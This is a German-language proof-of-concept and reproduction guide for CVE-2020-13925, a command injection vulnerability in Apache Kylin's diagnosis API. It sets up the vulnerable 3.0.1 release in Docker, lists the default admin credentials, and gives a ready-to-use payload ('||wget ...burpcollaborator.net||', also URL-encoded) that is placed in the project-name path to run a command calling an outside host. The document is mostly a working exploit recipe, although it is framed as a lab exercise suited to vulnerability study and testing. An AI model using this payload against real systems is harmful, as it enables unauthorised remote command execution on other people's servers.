
PoC und Reproduktionsanleitung für CVE-2020-13925, eine Command Injection-Schwachstelle in der Diagnose-API von Apache Kylin, mit Docker-basiertem Laboraufbau und Ausnutzungsschritten.
Siehe https://github.com/apache/kylin zur Bereitstellung der Umgebung mit Docker. Ändern Sie die Version auf 3.0.1 (die verwundbare Version). Sie können -m 8G \ entfernen, da es die Größe des zugewiesenen Arbeitsspeichers festlegt.
Greifen Sie dann auf http://host:7070/kylin/login zu. Der Standard-Benutzername und das Standard-Passwort sind ADMIN/KYLIN.
docker pull apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
Ursprüngliche Anfrage:
http://host:port/kylin/api/diag/project/learn_kylin/download
PoC-Anfrage, GET-Methode:
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download
Ersetzen Sie einfach den Projektnamen "learn_kylin" durch die folgende Payload:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||
Rufen Sie System-Configuration-Diagnosis auf. Lösen Sie die Anfrage zum Herunterladen der Diagnoseinformationen aus: http://host:port/kylin/api/diag/project/learn_kylin/download

Ersetzen Sie den Projektnamen "learn_kylin" durch die obige Payload und greifen Sie darauf zu.
